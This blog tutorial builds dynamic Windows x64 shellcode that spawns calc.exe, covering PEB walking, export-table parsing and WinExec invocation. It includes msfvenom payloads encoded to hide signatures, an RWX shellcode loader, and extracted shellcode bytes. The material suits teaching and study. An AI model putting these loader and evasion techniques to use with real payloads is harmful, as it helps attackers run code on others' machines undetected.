aidenpearce369

Windows x64 - Dynamic Shellcoding (calc.exe)

Prologue

In the last blog we covered the essentials of the PEB and TEB structures, and how to use them to walk the PE modules loaded in process memory and fetch the base addresses of the required DLLs.

Now we will write a simple C++ program to spawn a calc.exe process,

#include "Windows.h"

int main()
{
	WinExec("calc.exe", 0);
	return 0;
}

When this program runs, it should pop up a calc.exe process through the WinExec Win32 API exported by kernel32.dll.

WinExecCode

Creating the shellcode for the above program logic using msfvenom,

ubuntu-wsl@ra:~$ msfvenom --payload windows/x64/exec CMD=calc.exe -f c -b "\x00\x0a\x0d" -a x64 --platform windows
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=7, char=0x00)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 319 (iteration=0)
x64/xor chosen with final size 319
Payload size: 319 bytes
Final size of c file: 1369 bytes
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xdd\xff\xff\xff\x48\x8d\x05\xef"
"\xff\xff\xff\x48\xbb\x8e\x12\x12\x57\xf8\x56\x1f\xa3\x48"
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x72\x5a\x91"
"\xb3\x08\xbe\xdf\xa3\x8e\x12\x53\x06\xb9\x06\x4d\xf2\xd8"
"\x5a\x23\x85\x9d\x1e\x94\xf1\xee\x5a\x99\x05\xe0\x1e\x94"
"\xf1\xae\x5a\x99\x25\xa8\x1e\x10\x14\xc4\x58\x5f\x66\x31"
"\x1e\x2e\x63\x22\x2e\x73\x2b\xfa\x7a\x3f\xe2\x4f\xdb\x1f"
"\x16\xf9\x97\xfd\x4e\xdc\x53\x43\x1f\x73\x04\x3f\x28\xcc"
"\x2e\x5a\x56\x28\xdd\x9f\x2b\x8e\x12\x12\x1f\x7d\x96\x6b"
"\xc4\xc6\x13\xc2\x07\x73\x1e\x07\xe7\x05\x52\x32\x1e\xf9"
"\x86\xfc\xf5\xc6\xed\xdb\x16\x73\x62\x97\xeb\x8f\xc4\x5f"
"\x66\x31\x1e\x2e\x63\x22\x53\xd3\x9e\xf5\x17\x1e\x62\xb6"
"\xf2\x67\xa6\xb4\x55\x53\x87\x86\x57\x2b\x86\x8d\x8e\x47"
"\xe7\x05\x52\x36\x1e\xf9\x86\x79\xe2\x05\x1e\x5a\x13\x73"
"\x16\x03\xea\x8f\xc2\x53\xdc\xfc\xde\x57\xa2\x5e\x53\x4a"
"\x16\xa0\x08\x46\xf9\xcf\x4a\x53\x0e\xb9\x0c\x57\x20\x62"
"\x32\x53\x05\x07\xb6\x47\xe2\xd7\x48\x5a\xdc\xea\xbf\x48"
"\x5c\x71\xed\x4f\x1f\x42\x57\x1f\xa3\x8e\x12\x12\x57\xf8"
"\x1e\x92\x2e\x8f\x13\x12\x57\xb9\xec\x2e\x28\xe1\x95\xed"
"\x82\x43\xa6\xaa\x01\xd8\x53\xa8\xf1\x6d\xeb\x82\x5c\x5b"
"\x5a\x91\x93\xd0\x6a\x19\xdf\x84\x92\xe9\xb7\x8d\x53\xa4"
"\xe4\x9d\x60\x7d\x3d\xf8\x0f\x5e\x2a\x54\xed\xc7\x34\x99"
"\x3a\x7c\x8d\xeb\x6a\x77\x57\xf8\x56\x1f\xa3";

We have generated a shellcode of 319 bytes to spawn a calc.exe process. Here we haven't asked for any strong or custom encoder to obfuscate the shellcode for evasion; msfvenom only fell back to x64/xor to avoid the bad characters. If we explicitly use an encoder such as x64/xor_dynamic (or x86/shikata_ga_nai for 32-bit payloads), the payload size increases too.

ubuntu-wsl@ra:~$ msfvenom --payload windows/x64/exec CMD=calc.exe -f c -b "\x00\x0a\x0d" -a x64 --platform windows -e x64/xor_dynamic -i 5
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x64/xor_dynamic
x64/xor_dynamic succeeded with size 326 (iteration=0)
x64/xor_dynamic succeeded with size 376 (iteration=1)
x64/xor_dynamic succeeded with size 426 (iteration=2)
x64/xor_dynamic succeeded with size 476 (iteration=3)
x64/xor_dynamic succeeded with size 526 (iteration=4)
x64/xor_dynamic chosen with final size 526
Payload size: 526 bytes
Final size of c file: 2242 bytes
unsigned char buf[] =
"\xeb\x27\x5b\x53\x5f\xb0\x59\xfc\xae\x75\xfd\x57\x59\x53"
"\x5e\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f"
"\xd1\x68\x74\x07\x80\x3e\x59\x75\xea\xeb\xe6\xff\xe1\xe8"
"\xd4\xff\xff\xff\x4c\x59\xa7\x6b\x17\x1f\x13\xfc\xa7\xb0"
"\xe2\x39\xb1\x1b\x15\x1f\x12\xc6\x4a\x7c\x4b\x04\xb3\x8b"
"\x04\xb3\x8a\x2a\xcd\x73\x97\x8e\x38\x4b\xcc\x72\xa7\x39"
"\xa6\xa7\xaa\xb3\xad\xa4\x98\xb3\xb3\xb3\x43\xa7\xa8\x64"
"\x18\x10\x1c\xf3\xe5\xbf\xed\x36\xbe\x14\x1a\x10\x1d\xc9"
"\x45\x73\x44\x0b\xbc\x84\x0b\xbc\x85\x25\xc2\x7c\xbd\xd0"
"\x37\x44\xc3\x7d\xe5\x36\xa9\xa8\xa5\xbc\xa2\xab\x97\xbc"
"\xbc\xbc\x67\xe5\x8c\x40\x3c\x34\x38\xd7\xf5\x9b\xc9\x12"
"\x9a\x30\x3e\x34\x39\xed\x61\x57\x60\x2f\x98\xa0\x2f\x98"
"\xa1\x01\xe6\x58\x66\x61\x13\x60\xe7\x59\xf5\x12\x8d\x8c"
"\x81\x98\x86\x8f\xb3\x98\x98\x98\x63\xf5\x88\x44\x38\x30"
"\x3c\xd3\xe6\x9f\xcd\x16\x9e\x34\x3a\x30\x3d\xe9\x65\x53"
"\x64\x2b\x9c\xa4\x2b\x9c\xa5\x05\xe2\x5c\x23\xa5\x17\x64"
"\xe3\x5d\xe6\x16\x89\x88\x85\x9c\x82\x8b\xb7\x9c\x9c\x9c"
"\x73\xe6\x8f\x3b\xf0\x97\x83\x9b\xb3\x73\x73\x73\x32\x22"
"\x32\x23\x21\x22\x25\x3b\x42\xa1\x16\x3b\xf8\x21\x13\x3b"
"\xf8\x21\x6b\x3b\xf8\x21\x53\x3b\xf8\x01\x23\x3b\x7c\xc4"
"\x39\x39\x3e\x42\xba\x3b\x42\xb3\xdf\x4f\x12\x0f\x71\x5f"
"\x53\x32\xb2\xba\x7e\x32\x72\xb2\x91\x9e\x21\x32\x22\x3b"
"\xf8\x21\x53\xf8\x31\x4f\x3b\x72\xa3\xf8\xf3\xfb\x73\x73"
"\x73\x3b\xf6\xb3\x07\x14\x3b\x72\xa3\x23\xf8\x3b\x6b\x37"
"\xf8\x33\x53\x3a\x72\xa3\x90\x25\x3b\x8c\xba\x32\xf8\x47"
"\xfb\x3b\x72\xa5\x3e\x42\xba\x3b\x42\xb3\xdf\x32\xb2\xba"
"\x7e\x32\x72\xb2\x4b\x93\x06\x82\x3f\x70\x3f\x57\x7b\x36"
"\x4a\xa2\x06\xab\x2b\x37\xf8\x33\x57\x3a\x72\xa3\x15\x32"
"\xf8\x7f\x3b\x37\xf8\x33\x6f\x3a\x72\xa3\x32\xf8\x77\xfb"
"\x3b\x72\xa3\x32\x2b\x32\x2b\x2d\x2a\x29\x32\x2b\x32\x2a"
"\x32\x29\x3b\xf0\x9f\x53\x32\x21\x8c\x93\x2b\x32\x2a\x29"
"\x3b\xf8\x61\x9a\x24\x8c\x8c\x8c\x2e\x3b\xc9\x72\x73\x73"
"\x73\x73\x73\x73\x73\x3b\xfe\xfe\x72\x72\x73\x73\x32\xc9"
"\x42\xf8\x1c\xf4\x8c\xa6\xc8\x83\xc6\xd1\x25\x32\xc9\xd5"
"\xe6\xce\xee\x8c\xa6\x3b\xf0\xb7\x5b\x4f\x75\x0f\x79\xf3"
"\x88\x93\x06\x76\xc8\x34\x60\x01\x1c\x19\x73\x2a\x32\xfa"
"\xa9\x8c\xa6\x10\x12\x1f\x10\x5d\x16\x0b\x16\x73\x23\xa5"
"\x66\x61\xbd\xd0\x97\x8e\xd1\x68";

Running the payload through five iterations of the x64/xor_dynamic encoder, in order to hide the Metasploit signature, has increased the shellcode size to 526 bytes.
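As a quick sanity check on the numbers above, the growth per encoding pass can be worked out from the sizes msfvenom printed. This is only arithmetic on the reported output; the variable names are illustrative.

```python
# Sizes reported by msfvenom for each x64/xor_dynamic iteration (taken from the output above).
sizes = [326, 376, 426, 476, 526]

# Bytes added by each additional encoding pass.
deltas = [later - earlier for earlier, later in zip(sizes, sizes[1:])]
print(deltas)

# Total increase relative to the 319-byte x64/xor payload generated earlier.
growth = sizes[-1] - 319
print(growth)
```

Each extra pass costs the same fixed number of bytes, so the size grows linearly with the `-i` value.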

#include "Windows.h"
#include "stdio.h"

int main()
{
	unsigned char shellcode[] =
		"\xeb\x27\x5b\x53\x5f\xb0\x59\xfc\xae\x75\xfd\x57\x59\x53"
		"\x5e\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f"
		"\xd1\x68\x74\x07\x80\x3e\x59\x75\xea\xeb\xe6\xff\xe1\xe8"
		"\xd4\xff\xff\xff\x4c\x59\xa7\x6b\x17\x1f\x13\xfc\xa7\xb0"
		"\xe2\x39\xb1\x1b\x15\x1f\x12\xc6\x4a\x7c\x4b\x04\xb3\x8b"
		"\x04\xb3\x8a\x2a\xcd\x73\x97\x8e\x38\x4b\xcc\x72\xa7\x39"
		"\xa6\xa7\xaa\xb3\xad\xa4\x98\xb3\xb3\xb3\x43\xa7\xa8\x64"
		"\x18\x10\x1c\xf3\xe5\xbf\xed\x36\xbe\x14\x1a\x10\x1d\xc9"
		"\x45\x73\x44\x0b\xbc\x84\x0b\xbc\x85\x25\xc2\x7c\xbd\xd0"
		"\x37\x44\xc3\x7d\xe5\x36\xa9\xa8\xa5\xbc\xa2\xab\x97\xbc"
		"\xbc\xbc\x67\xe5\x8c\x40\x3c\x34\x38\xd7\xf5\x9b\xc9\x12"
		"\x9a\x30\x3e\x34\x39\xed\x61\x57\x60\x2f\x98\xa0\x2f\x98"
		"\xa1\x01\xe6\x58\x66\x61\x13\x60\xe7\x59\xf5\x12\x8d\x8c"
		"\x81\x98\x86\x8f\xb3\x98\x98\x98\x63\xf5\x88\x44\x38\x30"
		"\x3c\xd3\xe6\x9f\xcd\x16\x9e\x34\x3a\x30\x3d\xe9\x65\x53"
		"\x64\x2b\x9c\xa4\x2b\x9c\xa5\x05\xe2\x5c\x23\xa5\x17\x64"
		"\xe3\x5d\xe6\x16\x89\x88\x85\x9c\x82\x8b\xb7\x9c\x9c\x9c"
		"\x73\xe6\x8f\x3b\xf0\x97\x83\x9b\xb3\x73\x73\x73\x32\x22"
		"\x32\x23\x21\x22\x25\x3b\x42\xa1\x16\x3b\xf8\x21\x13\x3b"
		"\xf8\x21\x6b\x3b\xf8\x21\x53\x3b\xf8\x01\x23\x3b\x7c\xc4"
		"\x39\x39\x3e\x42\xba\x3b\x42\xb3\xdf\x4f\x12\x0f\x71\x5f"
		"\x53\x32\xb2\xba\x7e\x32\x72\xb2\x91\x9e\x21\x32\x22\x3b"
		"\xf8\x21\x53\xf8\x31\x4f\x3b\x72\xa3\xf8\xf3\xfb\x73\x73"
		"\x73\x3b\xf6\xb3\x07\x14\x3b\x72\xa3\x23\xf8\x3b\x6b\x37"
		"\xf8\x33\x53\x3a\x72\xa3\x90\x25\x3b\x8c\xba\x32\xf8\x47"
		"\xfb\x3b\x72\xa5\x3e\x42\xba\x3b\x42\xb3\xdf\x32\xb2\xba"
		"\x7e\x32\x72\xb2\x4b\x93\x06\x82\x3f\x70\x3f\x57\x7b\x36"
		"\x4a\xa2\x06\xab\x2b\x37\xf8\x33\x57\x3a\x72\xa3\x15\x32"
		"\xf8\x7f\x3b\x37\xf8\x33\x6f\x3a\x72\xa3\x32\xf8\x77\xfb"
		"\x3b\x72\xa3\x32\x2b\x32\x2b\x2d\x2a\x29\x32\x2b\x32\x2a"
		"\x32\x29\x3b\xf0\x9f\x53\x32\x21\x8c\x93\x2b\x32\x2a\x29"
		"\x3b\xf8\x61\x9a\x24\x8c\x8c\x8c\x2e\x3b\xc9\x72\x73\x73"
		"\x73\x73\x73\x73\x73\x3b\xfe\xfe\x72\x72\x73\x73\x32\xc9"
		"\x42\xf8\x1c\xf4\x8c\xa6\xc8\x83\xc6\xd1\x25\x32\xc9\xd5"
		"\xe6\xce\xee\x8c\xa6\x3b\xf0\xb7\x5b\x4f\x75\x0f\x79\xf3"
		"\x88\x93\x06\x76\xc8\x34\x60\x01\x1c\x19\x73\x2a\x32\xfa"
		"\xa9\x8c\xa6\x10\x12\x1f\x10\x5d\x16\x0b\x16\x73\x23\xa5"
		"\x66\x61\xbd\xd0\x97\x8e\xd1\x68";

	void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (exec != 0) {
		memcpy(exec, shellcode, sizeof shellcode);
		((void(*)())exec)();
	}
	return 0;
}

Running this code with our shellcode should spawn the calculator.

MetasploitShellcode

Let's create an executable with metasploit shellcode and analyze it with VirusTotal.

ubuntu-wsl@ra:~$ msfvenom --payload windows/x64/exec CMD=calc.exe -f exe -b "\x00\x0a\x0d" -a x64 --platform windows -o msfCalc.exe
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=7, char=0x00)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 319 (iteration=0)
x64/xor chosen with final size 319
Payload size: 319 bytes
Final size of exe file: 6656 bytes
Saved as: msfCalc.exe

MSFShellcodeVT

Link to msfCalc.exe sample

It is easy to generate and use these shellcodes. But at what cost? Shellcode generated by Metasploit or other frameworks is of little use in an environment where OPSEC matters: its well-known signatures give it a higher chance of being detected, and its size and complexity make it consume more memory. In this blog, we are going to learn how to craft a dynamic shellcode that runs on different machines of the same architecture.

Reaching the PE

The GS register is one of the x86 segment registers (the name has no official expansion; it simply follows FS). In 64-bit long mode segmentation is mostly disabled, but FS and GS keep a usable base address, which the operating system and language runtimes use to reach data that is specific to the current thread, such as thread-local storage (TLS). On 64-bit Windows, the GS base in user mode points to the TEB of the current thread.

To access the TEB directly using the GS register, we read the pointer stored at offset 0x30, which is the Self field of the NT_TIB at the start of the TEB.

Now let's start coding our shellcode from the assembly level.

section .text
    global main

main:

.findingDLL:
    mov rbx, [gs:0x30];
    mov rbx, [rbx+0x60];
    mov rbx, [rbx+0x18];
    mov rbx, [rbx+0x20];
    mov rbx, [rbx];
    mov rbx, [rbx];
    sub rbx, 0x10;
    mov rbx, [rbx+0x30];
    mov r9,rbx;

  1. mov rbx, [gs:0x30] - Accessing the pointer of TEB via the GS register.
  2. mov rbx, [rbx+0x60] - Accessing the pointer of PEB from the TEB structure.
  3. mov rbx, [rbx+0x18] - Getting the pointer of Ldr within the PEB structure.
  4. mov rbx, [rbx+0x20] - Reading the Flink of InMemoryOrderModuleList, which points to the entry of the process executable itself; that entry's Flink leads to ntdll.dll.
  5. mov rbx, [rbx] - Getting the Flink of next loaded module ntdll.dll.
  6. mov rbx, [rbx] - Getting the Flink of next loaded module kernel32.dll.
  7. sub rbx, 0x10 - Stepping back from the InMemoryOrderLinks _LIST_ENTRY to the start of the _LDR_DATA_TABLE_ENTRY of kernel32.dll.
  8. mov rbx, [rbx+0x30] - Fetching the base address (DllBase) of kernel32.dll.
  9. mov r9,rbx - Storing the base address of kernel32.dll.

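NOTE : The PEB can also be accessed directly via the GS register at an offset of 0x60, which removes one instruction from our code. I didn't want to explain it in the previous blog, since I wanted to show how the PEB is referenced from the TEB. The sub rbx, 0x10 step can be folded away as well by reading DllBase at [rbx+0x20] (0x30 - 0x10) straight from the list entry.

Now the modified assembly code becomes,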

section .text
    global main

main:

.findingDLL:
    mov rbx, [gs:0x60];
    mov rbx, [rbx+0x18];
    mov rbx, [rbx+0x20];
    mov rbx, [rbx];
    mov rbx, [rbx];
    mov rbx, [rbx+0x20];
    mov r9,rbx;
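The offsets used in this walk can be double-checked by laying out the leading fields of the two loader structures. The following is a minimal sketch, assuming the x64 layouts described above; pointers are modeled as plain 64-bit integers so it runs on any platform, and the Python class names are illustrative only.

```python
import ctypes

class ListEntry(ctypes.Structure):
    # _LIST_ENTRY: two 8-byte pointers on x64, modeled as integers.
    _fields_ = [("Flink", ctypes.c_uint64), ("Blink", ctypes.c_uint64)]

class PebLdrData(ctypes.Structure):
    # Leading fields of _PEB_LDR_DATA (x64), with the padding made explicit.
    _fields_ = [
        ("Length", ctypes.c_uint32),
        ("Initialized", ctypes.c_uint8),
        ("Padding", ctypes.c_uint8 * 3),
        ("SsHandle", ctypes.c_uint64),
        ("InLoadOrderModuleList", ListEntry),
        ("InMemoryOrderModuleList", ListEntry),
    ]

class LdrDataTableEntry(ctypes.Structure):
    # Leading fields of _LDR_DATA_TABLE_ENTRY (x64).
    _fields_ = [
        ("InLoadOrderLinks", ListEntry),
        ("InMemoryOrderLinks", ListEntry),
        ("InInitializationOrderLinks", ListEntry),
        ("DllBase", ctypes.c_uint64),
    ]

ldr_list_offset = PebLdrData.InMemoryOrderModuleList.offset
links_offset = LdrDataTableEntry.InMemoryOrderLinks.offset
dllbase_offset = LdrDataTableEntry.DllBase.offset

print(hex(ldr_list_offset))                # offset applied to the Ldr pointer
print(hex(links_offset))                   # amount removed by `sub rbx, 0x10`
print(hex(dllbase_offset - links_offset))  # folded offset used in the shorter listing
```

Since every Flink in InMemoryOrderModuleList points at the InMemoryOrderLinks field rather than at the start of the entry, DllBase is always 0x20 bytes past the pointer the list walk yields.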

Parsing the PE

By now we have reached the base address of kernel32.dll. Let's parse the loaded PE module to reach the Export Directory of the DLL and find our required functions.

.findingEAT:
    xor rbx,rbx;
    xor rdx,rdx;
    mov bx, [r9+0x3c];
    add rbx,r9;
    mov edx, [rbx+0x88];
    add rdx,r9;
    mov r8,rdx;

  1. xor rbx,rbx / xor rdx,rdx - Clearing the registers; r9 already holds the base address of kernel32.dll.
  2. mov bx, [r9+0x3c] - Reading e_lfanew, the offset of the PE header/PE signature, from the DOS header. Only the low 16 bits are read, which is enough because this offset is small.
  3. add rbx,r9 - Calculating the virtual address of PE header/PE signature.
  4. mov edx, [rbx+0x88] - Reading the RVA of the Export Directory. The Optional NT header starts 0x18 bytes into the PE header, and the Export Directory entry sits 0x70 bytes into the Optional NT header, hence 0x88.
  5. add rdx,r9 - Calculating the virtual address of the Export Directory.
  6. mov r8,rdx - Store the address of Export Directory.
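The 0x88 offset used in the final listing is the sum of the header sizes that precede the first data directory entry of a PE32+ image. The sketch below derives it and runs the same walk over a buffer; the image is a hypothetical, mostly empty one built only to exercise the offsets, and the function name is illustrative.

```python
import struct

E_LFANEW_OFFSET = 0x3C         # DOS header field holding the PE header offset
SIGNATURE_SIZE = 4             # "PE\0\0"
FILE_HEADER_SIZE = 20          # IMAGE_FILE_HEADER
DATA_DIRECTORY_OFFSET = 0x70   # DataDirectory inside a PE32+ optional header

# The export entry is DataDirectory[0], so its RVA sits here relative to the PE header.
EXPORT_RVA_OFFSET = SIGNATURE_SIZE + FILE_HEADER_SIZE + DATA_DIRECTORY_OFFSET

def export_directory_rva(image: bytes) -> int:
    """Return the export directory RVA of a PE32+ image held in a buffer."""
    (e_lfanew,) = struct.unpack_from("<I", image, E_LFANEW_OFFSET)
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    (rva,) = struct.unpack_from("<I", image, e_lfanew + EXPORT_RVA_OFFSET)
    return rva

# Hypothetical image: only the fields touched by the walk are filled in.
fake = bytearray(0x200)
fake[0:2] = b"MZ"
struct.pack_into("<I", fake, E_LFANEW_OFFSET, 0xE8)
fake[0xE8:0xEC] = b"PE\x00\x00"
struct.pack_into("<I", fake, 0xE8 + EXPORT_RVA_OFFSET, 0x9A1E0)

print(hex(EXPORT_RVA_OFFSET))
print(hex(export_directory_rva(bytes(fake))))
```

In the shellcode the same two reads happen against the mapped module, and the base address is added to turn the RVA into a virtual address.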

Name Pointer Table and Ordinal Table

We have now reached the Export Directory of the PE. Let's parse the Export Directory to find the EAT, Name Pointer Table, Ordinal Table and find the RVA of the required functions.

Here we have a loop to find the position of the target function inside the Name Pointer table. Using that value we will be calculating the Ordinal Number.

    xor rbx,rbx;
    mov ebx, [rdx+0x20];
    add rbx, r9;
    mov rsi, rbx;

Here we read the RVA of the Name Pointer Table from offset 0x20 of the Export Directory, add the base address to get its virtual address, and store it in the rsi register.

    mov rdx, 0x636578456e695741;
    shr rdx, 8;
    xor rcx, rcx;

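Storing the string value of WinExec\0 in the rdx register: the constant holds the bytes of "AWinExec", and the right shift by 8 bits drops the leading A and brings in a zero byte at the end, so the terminator never has to appear in the instruction itself. Using rcx as counter variable and initializing it to zero.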
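The effect of the shift on the constant can be checked with a few lines of arithmetic. This is a small sketch that only reproduces the two instructions on a Python integer; the variable names are illustrative.

```python
IMMEDIATE = 0x636578456E695741

# Bytes as they would sit in memory for the 64-bit immediate (x64 is little-endian).
before = IMMEDIATE.to_bytes(8, "little")

# Logical right shift by 8 bits, as `shr rdx, 8` does.
after = (IMMEDIATE >> 8).to_bytes(8, "little")

print(before)  # b'AWinExec'
print(after)   # b'WinExec\x00'
```

The eight bytes in `after` are exactly what `cmp qword [rax], rdx` compares against the start of each exported name.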

SearchFunction:
    inc rcx;
    xor rax,rax;
    mov eax, [rsi+(rcx*4)];
    add rax,r9;
    cmp qword [rax], rdx;
    jne SearchFunction

When execution enters the loop, it increments the rcx register, reads the RVA of the next function name from the Name Pointer Table, and adds the base address to get the virtual address of the name string. The first eight bytes of that string are compared with the target function name held in rdx. On a mismatch, the jne instruction jumps back to SearchFunction; on a match, execution falls through and leaves the loop. Because rcx is incremented before the first read, entry 0 is never tested, which is harmless here. At this point rcx holds the zero-based position of WinExec in the Name Pointer Table, which we treat as Ordinal Number - 1 and use directly as the index into the EAT. This saves the instructions needed to consult the Ordinal Table, at the price of assuming that the name position and the EAT index coincide for this export.

The code for this section will be,

.findingFunction:
    xor rbx,rbx;
    mov ebx, [rdx+0x20];
    add rbx, r9;
    mov rsi, rbx;
    mov rdx, 0x636578456e695741;
    shr rdx, 8;
    xor rcx, rcx;

SearchFunction:
    inc rcx;
    xor rax,rax;
    mov eax, [rsi+(rcx*4)];
    add rax,r9;
    cmp qword [rax], rdx;
    jne SearchFunction

Function Address from EAT

.queryingEAT:
    xor rdx,rdx;
    mov dl, 4;
    imul rcx, rdx;
    xor rbx,rbx;
    mov ebx, [r8+0x1c];
    add rbx, r9;
    mov edx, [rbx+rcx]
    add rdx,r9;
    mov rdi,rdx;

We multiply RCX (Ordinal Number - 1) by 4, the size of a DWORD, because each entry in the EAT is a 4-byte RVA. We then read the RVA of the EAT from offset 0x1c of the Export Directory and calculate its virtual address. The RVA of the target function is read from (EAT Virtual Address + (Counter Value)*4). Adding that RVA to the base address of the DLL gives the virtual address of the target function, which we keep in rdi.
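The listing indexes the EAT directly with the position found in the Name Pointer Table. In the PE format, that position first selects a 16-bit entry in the Ordinal Table, and that entry is the index into the EAT. The sketch below models both lookups with plain lists; the export names, ordinals and RVAs are made up for illustration and deliberately arranged so the two paths differ.

```python
from typing import List

def resolve_export(names: List[str], ordinals: List[int],
                   functions: List[int], target: str) -> int:
    """Resolve a function RVA by following the three export tables in order."""
    name_index = names.index(target)       # position in the Name Pointer Table
    function_index = ordinals[name_index]  # 16-bit entry from the Ordinal Table
    return functions[function_index]       # 4-byte RVA from the EAT

# Hypothetical export data, not taken from a real kernel32.dll.
names = ["AcquireSRWLockExclusive", "WinExec", "lstrlenW"]
ordinals = [0, 2, 1]                  # name order and EAT order differ here
functions = [0x1000, 0x3000, 0x2000]

rva = resolve_export(names, ordinals, functions, "WinExec")
shortcut = functions[names.index("WinExec")]  # EAT indexed by name position
print(hex(rva), hex(shortcut))
```

When the Ordinal Table maps every name position to the same EAT index, both paths return the same RVA, which is the situation the shorter assembly relies on.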

Invoking Target Function

Since we are invoking the WinExec Win API, we need to know its signature.

UINT WinExec(
  [in] LPCSTR lpCmdLine,
  [in] UINT   uCmdShow
);

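Under the Windows x64 calling convention the first argument goes in RCX and the second in RDX. We load UINT uCmdShow (zero) into RDX, build the string calc.exe on the stack, and point RCX at it for LPCSTR lpCmdLine; the zero quadwords pushed first terminate the string. Let's also reserve some stack space below it, because the function we invoke may use the stack for its shadow space and temporary variables, which could otherwise trouble our data. After calling the function, the stack pointer is restored and execution returns. Note that the listing releases only the 0x50 bytes it reserved: the three pushed quadwords (0x18 bytes) are still on the stack when ret executes, so a version that has to return cleanly to its caller would need to release them as well.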

.callingWinExec:
    xor rdx, rdx;
    push rdx;
    push rdx;
    mov rcx, 0x6578652e636c6163;
    push rcx;
    mov rcx, rsp;
    sub rsp,0x50
    call rdi;
    add rsp, 0x50;
    ret;
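Two details of this block are easy to verify with arithmetic: the bytes of the pushed constant, and how the stack pointer moves. This is a minimal sketch, assuming the shellcode is entered through a call from a caller whose stack was 16-byte aligned (as with the C++ wrapper used in this post); the variable names are illustrative.

```python
CMD_IMMEDIATE = 0x6578652E636C6163

# Bytes written to the stack by `push rcx` (little-endian).
cmd_bytes = CMD_IMMEDIATE.to_bytes(8, "little")
print(cmd_bytes)

# Track rsp relative to the caller's 16-byte aligned stack pointer.
rsp = 0
rsp -= 8        # return address pushed by the caller's `call`
entry_rsp = rsp
rsp -= 3 * 8    # push rdx; push rdx; push rcx
rsp -= 0x50     # sub rsp, 0x50
aligned_at_call = rsp % 16 == 0
rsp += 0x50     # add rsp, 0x50

# Bytes still sitting between rsp and the return address when `ret` runs.
leftover = entry_rsp - rsp
print(aligned_at_call, hex(leftover))
```

The second zero quadword is what brings the stack back to 16-byte alignment at the call, and the non-zero leftover is why `ret` in this listing does not land on the original return address.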

Generating Shellcode

Now the shellcode for the whole logic will be,

section .text
    global main

main:

.findingDLL:
    mov rbx, [gs:0x60];
    mov rbx, [rbx+0x18];
    mov rbx, [rbx+0x20];
    mov rbx, [rbx];
    mov rbx, [rbx];
    mov rbx, [rbx+0x20];
    mov r9,rbx;

.findingEAT:
    xor rbx,rbx;
    xor rdx,rdx;
    mov bx, [r9+0x3c]; 
    add rbx,r9;
    mov edx, [rbx+0x88];
    add rdx,r9;
    mov r8,rdx; 


.findingFunction:
    xor rbx,rbx;
    mov ebx, [rdx+0x20];
    add rbx, r9;
    mov rsi, rbx;
    mov rdx, 0x636578456e695741;
    shr rdx, 8;
    xor rcx, rcx;

SearchFunction:
    inc rcx;
    xor rax,rax;
    mov eax, [rsi+(rcx*4)];
    add rax,r9;
    cmp qword [rax], rdx;
    jne SearchFunction

.queryingEAT:
    xor rdx,rdx;
    mov dl, 4;
    imul rcx, rdx;
    xor rbx,rbx;
    mov ebx, [r8+0x1c];
    add rbx, r9;
    mov edx, [rbx+rcx]
    add rdx,r9;
    mov rdi,rdx;

.callingWinExec:
    xor rdx, rdx;
    push rdx;
    push rdx;
    mov rcx, 0x6578652e636c6163;
    push rcx;
    mov rcx, rsp;
    sub rsp,0x50
    call rdi;
    add rsp, 0x50;
    ret;

Let's compile and extract shellcode from it.

(Linux)
ubuntu-wsl@ra:/mnt/e/Shellcoding$ nasm -f win64 shellcode.asm -o CalcShellcode.o

(Windows)
E:\Shellcoding>link /ENTRY:main /MACHINE:X64 /NODEFAULTLIB /SUBSYSTEM:CONSOLE CalcShellcode.o
Microsoft (R) Incremental Linker Version 14.00.24247.2
Copyright (C) Microsoft Corporation.  All rights reserved.

(Linux)
ubuntu-wsl@ra:/mnt/e/Shellcoding$ objdump -d CalcShellcode.exe >dump
ubuntu-wsl@ra:/mnt/e/Shellcoding$ ./extract dump

Odfhex - object dump shellcode extractor - by steve hanna - v.01
Trying to extract the hex of dump which is 2672 bytes long
"\x65\x48\x8b\x1c\x25\x60\x00\x00\x00\x48\x8b\x5b\x18\x48\x8b\x5b\x20"\
"\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd9\x48\x31\xdb\x48"\
"\x31\xd2\x66\x41\x8b\x59\x3c\x4c\x01\xcb\x8b\x93\x88\x00\x00\x00\x4c"\
"\x01\xca\x49\x89\xd0\x48\x31\xdb\x8b\x5a\x20\x4c\x01\xcb\x48\x89\xde"\
"\x48\xba\x41\x57\x69\x6e\x45\x78\x65\x63\x48\xc1\xea\x08\x48\x31\xc9"\
"\x48\xff\xc1\x48\x31\xc0\x8b\x04\x8e\x4c\x01\xc8\x48\x39\x10\x75\xef"\
"\x48\x31\xd2\xb2\x04\x48\x0f\xaf\xca\x48\x31\xdb\x41\x8b\x58\x1c\x4c"\
"\x01\xcb\x8b\x14\x0b\x4c\x01\xca\x48\x89\xd7\x48\x31\xd2\x52\x52\x48"\
"\xb9\x63\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x89\xe1\x48\x83\xec\x50"\
"\xff\xd7\x48\x83\xc4\x50\xc3";

160 bytes extracted.

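We still have some \x00 null bytes in our shellcode. They come from the 32-bit displacements 0x60 and 0x88, and they are not a problem here because the wrapper copies the buffer with memcpy and an explicit length. They would only matter if the shellcode had to pass through a string-handling function. Let's check our shellcode execution.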
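To see where the null bytes sit, the two instructions that carry them can be inspected on their own. The byte sequences below are copied from the extracted shellcode; the helper name is illustrative.

```python
# The two instruction encodings from the extracted shellcode that contain zero bytes.
mov_gs = bytes.fromhex("65488b1c2560000000")  # mov rbx, [gs:0x60]
mov_edx = bytes.fromhex("8b9388000000")       # mov edx, [rbx+0x88]

def null_offsets(code: bytes) -> list:
    """Return the positions of zero bytes inside an instruction encoding."""
    return [index for index, value in enumerate(code) if value == 0]

print(null_offsets(mov_gs))
print(null_offsets(mov_edx))

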